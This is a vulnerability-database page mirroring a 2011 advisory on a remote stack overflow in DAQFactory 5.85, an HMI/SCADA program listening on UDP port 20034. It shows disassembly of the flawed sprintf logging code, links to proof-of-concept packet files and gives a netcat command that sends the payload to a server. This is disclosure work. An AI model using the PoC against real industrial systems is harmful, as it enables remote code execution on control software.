Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DaqFactory 5.85 build 1853 - Stack Overflow

🗓️ 14 Sep 2011 00:00:00Reported by Luigi AuriemmaType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 23 Views

DAQFactory 5.85 build 1853 - Stack Overflow in Window

Code
#######################################################################

                             Luigi Auriemma

Application:  DAQFactory
              http://www.azeotech.com/daqfactory.php
Versions:     <= 5.85 build 1853
Platforms:    Windows
Bug:          stack overflow
Exploitation: remote
Date:         13 Sep 2011
Author:       Luigi Auriemma
              e-mail: [email protected]
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


DAQFactory is an HMI/SCADA software.


#######################################################################

======
2) Bug
======


When DAQFactory is running it listens on the UDP port 20034 for NETB
packets of max 0x400 bytes.

The software is affected by a stack overflow in the code that logs the
informations of the incoming packet allowing an attacker to execute
malicious code:

  005C3FB0  /$ 6A FF             PUSH -1
  005C3FB2  |. 68 E6777D00       PUSH DAQFacto.007D77E6
  005C3FB7  |. 64:A1 00000000    MOV EAX,DWORD PTR FS:[0]
  005C3FBD  |. 50                PUSH EAX
  005C3FBE  |. 64:8925 00000000  MOV DWORD PTR FS:[0],ESP
  005C3FC5  |. 81EC 2C020000     SUB ESP,22C
  ...skip...
  005C41B2  |. 8D8C24 7C010000   LEA ECX,DWORD PTR SS:[ESP+17C]
  005C41B9  |. 68 B02C9000       PUSH DAQFacto.00902CB0     ; "MAC:[%02x-%02X-%02X-%02X-%02X-%02X] IP:%d.%d.%d.%d DHCP:%d.%d.%d.%d %s%s"
  005C41BE  |. 51                PUSH ECX
  005C41BF  |. FF15 6CC07F00     CALL DWORD PTR DS:[<&MSVCRT.sprintf>]
  ..and..
  005C423A  |. 8D8C24 6C010000   LEA ECX,DWORD PTR SS:[ESP+16C]
  005C4241  |. 68 682C9000       PUSH DAQFacto.00902C68     ; "MAC: [%02x-%02X-%02X-%02X-%02X-%02X]    IP:%d.%d.%d.%d %s%s"
  005C4246  |. 51                PUSH ECX
  005C4247  |. FF15 6CC07F00     CALL DWORD PTR DS:[<&MSVCRT.sprintf>]


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/daqfactory_1.dat
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17841.dat

  nc SERVER 20034 -u < daqfactory_1.dat


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Sep 2011 00:00Current
7.4High risk
Vulners AI Score7.4
daqfactory hmi/scada software udp stack overflow remote exploit windows 2011 luigi auriemma nc server 20034 datapacket_gitlab_fixno fix
23